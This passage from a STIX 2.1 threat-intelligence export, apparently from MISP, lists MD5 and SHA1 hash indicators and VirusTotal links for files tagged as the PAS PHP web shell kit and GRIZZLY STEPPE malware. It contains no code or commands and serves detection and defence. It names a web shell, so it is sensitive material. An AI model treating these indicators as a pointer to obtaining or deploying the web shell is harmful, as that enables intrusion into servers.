"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'cf234fc1428c1c373329ef8968f15a18']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:40Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:40.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:40.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:40Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:40Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab44-0f7c-4a97-af10-4c3702de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b/analysis/1477574567/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab45-c924-4de1-b9ab-467c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:41.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:41.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '87daaf2f780070d27b33121dac32a551c414118b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:41Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab46-dc58-4709-8ae0-4d1402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:42.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:42.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b",
|
|
|
|
"pattern": "[file:hashes.MD5 = '5b3cd08ff49c275db2d43b49f8b48536']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:42Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:42.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:42.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:42Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:42Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab46-ba50-4053-81bc-4c3f02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b/analysis/1479979215/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab47-d8ec-4ab6-b28d-46e002de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:43.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:43.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '7cefb021fb30f985b427b584be9c16e364836739']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:43Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab47-d048-4e88-bf6a-4e7d02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:43.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:43.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5",
|
|
|
|
"pattern": "[file:hashes.MD5 = '617ba99be8a7d0771628344d209e9d8a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:43Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:44.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:44.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:44Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:44Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab48-a968-445a-ba1b-465b02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5/analysis/1483140658/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab49-2f70-477a-80b0-4bee02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:45.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:45.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'd096f0d002248fbd9dc1974aacc8488055164952']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:45Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab49-3744-422a-a88d-4a9c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:45.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:45.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501",
|
|
|
|
"pattern": "[file:hashes.MD5 = '33b50141621d210c7f9ea459df51ca0d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:45Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:46.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:46.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:46Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:46Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4a-4bd8-46c6-aa14-427502de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501/analysis/1481219566/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4a-c524-42b3-8c3b-428402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:46.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:46.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '8d44025cada9c6b944972a2654d010cc033da46e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:46Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4b-a970-41e0-9852-4ecb02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:47.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:47.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'b3ed966817f5eec53e544e78159e3d88']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:47Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:47.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:47.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:47Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:47Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4b-a214-4922-a374-41ce02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422/analysis/1480710869/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4c-a6a4-4421-86a1-481602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:48.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:48.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'd1828dce4bf476ca07629e1613dd77c3346e2c5a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:48Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4d-83e0-4c70-a4ee-455602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:49.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:49.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf",
|
|
|
|
"pattern": "[file:hashes.MD5 = '38f7149d4ec01509c3a36d4567125b18']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:49Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:49.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:49.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:49Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:49Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4d-09a0-46be-90b6-42d102de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf/analysis/1483125346/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4e-0a04-45cb-972a-44e502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:50.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:50.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'a968da4b9995c5447922cd8a2e64ca1f12b7732d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:50Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4f-b268-4b7d-a305-406302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:51.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:51.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6",
|
|
|
|
"pattern": "[file:hashes.MD5 = '2084cea563407db815b86b412ef7c876']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:51Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:51.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:51.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:51Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:51Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4f-b148-40b8-9d4a-405f02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6/analysis/1477125094/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab50-0eac-468d-aadb-44a902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:52.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:52.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '0e887d8a4223d38d4a7f2950a8b420a86610a72a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:52Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab50-8ac4-419f-ae00-414302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:52.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:52.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'ca22387a1c8eeb8fcf73cf745154ae63']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:52Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:53.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:53.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:53Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:53Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab51-0a10-44bf-91f0-460d02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb/analysis/1477637515/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab52-f1f4-4003-afe1-409502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:54.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:54.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'd16531f0b29ff74c25ab2972726d02324a631ac3']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:54Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab52-5264-4faf-9aa1-4ba302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:54.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:54.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'ac7d3cb8db93534c30667b0b7d5cc443']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:54Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
